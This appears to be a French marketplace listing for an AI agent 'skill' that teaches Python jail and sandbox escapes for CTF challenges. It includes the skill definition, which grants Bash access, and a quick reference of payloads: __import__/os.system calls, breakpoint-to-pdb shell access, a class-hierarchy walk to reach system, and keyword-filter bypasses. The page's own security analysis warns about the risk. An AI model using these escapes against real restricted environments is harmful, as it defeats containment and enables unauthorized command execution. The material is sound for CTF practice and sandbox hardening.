Notre avis
Fournit des techniques pour échapper aux environnements Python restreints (jails) en contournant les filtres et en exécutant des commandes.
Points forts
- Couvre plusieurs techniques d'évasion (builtins, hiérarchie de classes, breakpoint)
- Inclut une référence rapide et des méthodes de débogage
- Adapté aux défis CTF et aux environnements sécurisés
Limites
- Suppose une connaissance de base de Python
- Peut ne pas fonctionner contre toutes les implémentations de sandbox (par exemple, builtins complètement bloqués)
- Certaines techniques peuvent être corrigées dans les versions récentes de Python
Lorsque vous rencontrez un sandbox Python ou un jail qui restreint l'exécution de code et que vous devez exfiltrer des données ou exécuter des commandes système.
Dans des environnements de production ou des systèmes dont vous n'êtes pas propriétaire, et lorsque d'autres méthodes de contournement plus simples sont disponibles.
Analyse de sécurité
PrudenceThe skill is a collection of Python jail escape payloads and techniques. While intended for educational or CTF use, it inherently enables circumventing security restrictions in Python environments. When combined with the allowed Bash tool, an agent could execute arbitrary system commands, posing a moderate risk if not properly sandboxed.
- •Teaches Python sandbox escape techniques that enable arbitrary command execution via system calls.
- •Allows use of Bash tool, which could be leveraged to run destructive commands if combined with an escaped shell.
- •Provides methods to bypass keyword filters and restricted builtins, potentially leading to unauthorized access.
Exemples
I need to escape a Python eval sandbox that blocks 'import' and 'os'. How can I execute 'cat flag.txt' using string concatenation or character codes?In a Python jail with no builtins available, find a way to access the os module using the class hierarchy of tuples or strings to execute 'ls -la'.I'm in a Python 3.7+ jail that allows breakpoint(). Show me how to drop into pdb and run shell commands to read a file.name: pyjail description: Escapes Python sandbox restrictions. Use when working with restricted Python eval/exec environments, sandbox escapes, filtered input challenges, or Python jail challenges. allowed-tools: Bash, Read, Write, Grep, Glob
Python Jail Escape Skill
Quick Workflow
Progress:
- [ ] Identify restrictions (blocked keywords/chars)
- [ ] Try basic escapes first
- [ ] If builtins blocked, use class hierarchy
- [ ] Bypass filters with encoding/concatenation
- [ ] Execute command to get flag
Quick Reference - Common Escapes
# Basic command execution
__import__('os').system('cat flag.txt')
eval("__import__('os').system('id')")
exec("import os; os.system('ls')")
# Using breakpoint (Python 3.7+)
breakpoint() # Drops into pdb, then !cat flag.txt
# No builtins - class hierarchy
().__class__.__base__.__subclasses__()[132].__init__.__globals__['system']('cat flag')
# Keyword bypass
__import__('o'+'s').system('cat flag')
__import__(chr(111)+chr(115)).system('cat flag')
Reference Files
| Topic | Reference | |-------|-----------| | Bypass Techniques | reference/bypass.md | | Complete Payloads | reference/payloads.md |
Quick Debugging
# Find useful class index
for i, c in enumerate(().__class__.__base__.__subclasses__()):
if 'wrap' in str(c): print(i, c)
# Check available builtins
dir(__builtins__)
Auditeur de Securite
Securite
Analyse le code pour detecter les vulnerabilites OWASP Top 10.
Checklist de Sécurité OWASP
Securite
Génère des checklists de sécurité applicative basées sur l'OWASP Top 10.
Modélisation de Menaces
Securite
Génère des documents de modélisation de menaces avec analyse STRIDE.